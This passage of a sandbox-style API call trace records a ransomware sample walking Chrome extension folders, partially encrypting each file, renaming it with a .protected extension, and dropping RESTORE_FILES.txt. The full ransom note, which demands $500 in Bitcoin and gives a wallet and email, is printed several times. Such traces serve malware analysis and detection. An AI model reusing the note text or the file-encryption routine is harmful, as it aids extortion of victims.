write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.026] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0084.026] CloseHandle (hObject=0x164) returned 1 [0084.026] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0084.026] lstrcmpiW (lpString1="zh_TW", lpString2="Windows") returned 1 [0084.026] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files") returned 1 [0084.026] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files (x86)") returned 1 [0084.026] lstrcmpiW (lpString1="zh_TW", lpString2="$Recycle.bin") returned 1 [0084.026] lstrcmpiW (lpString1="zh_TW", lpString2="System Volume Information") returned 1 [0084.026] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW") returned 153 [0084.026] lstrcmpW (lpString1="zh_TW", lpString2=".") returned 1 [0084.026] lstrcmpW (lpString1="zh_TW", lpString2="..") returned 1 [0084.026] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\*") returned 155 [0084.026] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0084.026] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.026] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.026] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.026] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.026] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.026] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\.") returned 155 [0084.026] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.026] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0084.026] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.026] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.026] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.027] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.027] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.027] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\..") returned 156 [0084.027] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.027] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.027] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0084.027] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0084.027] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0084.027] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0084.027] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0084.027] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0084.027] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json") returned 167 [0084.027] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0084.027] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0084.027] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0084.027] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0084.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0084.027] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json") returned 167 [0084.027] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0084.027] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json") returned 167 [0084.027] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0084.027] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json") returned 167 [0084.027] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0084.027] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0084.029] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.029] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0084.029] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.029] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0084.030] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0084.030] CloseHandle (hObject=0x168) returned 1 [0084.030] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json.protected") returned 177 [0084.030] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\messages.json.protected")) returned 1 [0084.030] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0084.030] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0084.030] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\RESTORE_FILES.txt") returned 171 [0084.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_TW\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh_tw\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0084.031] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.031] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0084.031] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.032] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0084.032] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.032] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0084.032] CloseHandle (hObject=0x164) returned 1 [0084.032] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0084.032] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0084.032] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\RESTORE_FILES.txt") returned 165 [0084.032] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0084.032] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.032] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0084.033] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.033] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0084.033] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.033] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0084.033] CloseHandle (hObject=0x160) returned 1 [0084.033] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0084.033] lstrcmpiW (lpString1="_metadata", lpString2="Windows") returned -1 [0084.033] lstrcmpiW (lpString1="_metadata", lpString2="Program Files") returned -1 [0084.033] lstrcmpiW (lpString1="_metadata", lpString2="Program Files (x86)") returned -1 [0084.033] lstrcmpiW (lpString1="_metadata", lpString2="$Recycle.bin") returned 1 [0084.033] lstrcmpiW (lpString1="_metadata", lpString2="System Volume Information") returned -1 [0084.033] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata") returned 148 [0084.033] lstrcmpW (lpString1="_metadata", lpString2=".") returned 1 [0084.033] lstrcmpW (lpString1="_metadata", lpString2="..") returned 1 [0084.034] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\*") returned 150 [0084.034] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0084.034] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.034] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.034] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.034] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.034] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.034] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\.") returned 150 [0084.034] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.034] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0084.034] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.034] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.034] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.034] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.034] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.034] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\..") returned 151 [0084.034] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.034] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.034] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0084.034] lstrcmpiW (lpString1="computed_hashes.json", lpString2="Windows") returned -1 [0084.034] lstrcmpiW (lpString1="computed_hashes.json", lpString2="Program Files") returned -1 [0084.034] lstrcmpiW (lpString1="computed_hashes.json", lpString2="Program Files (x86)") returned -1 [0084.034] lstrcmpiW (lpString1="computed_hashes.json", lpString2="$Recycle.bin") returned 1 [0084.034] lstrcmpiW (lpString1="computed_hashes.json", lpString2="System Volume Information") returned -1 [0084.034] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json") returned 169 [0084.034] StrStrIW (lpFirst="computed_hashes.json", lpSrch=".protected") returned 0x0 [0084.034] lstrcmpW (lpString1="computed_hashes.json", lpString2="RESTORE_FILES.txt") returned -1 [0084.034] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0084.035] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0084.035] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0084.035] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json") returned 169 [0084.035] StrStrW (lpFirst="computed_hashes.json", lpSrch=".txt") returned 0x0 [0084.035] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json") returned 169 [0084.035] StrStrW (lpFirst="computed_hashes.json", lpSrch=".rar") returned 0x0 [0084.035] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json") returned 169 [0084.035] StrStrW (lpFirst="computed_hashes.json", lpSrch=".zip") returned 0x0 [0084.035] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0084.046] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.046] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0084.046] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.046] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0084.047] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0084.047] CloseHandle (hObject=0x164) returned 1 [0084.047] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json.protected") returned 179 [0084.047] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\computed_hashes.json" (normalized: 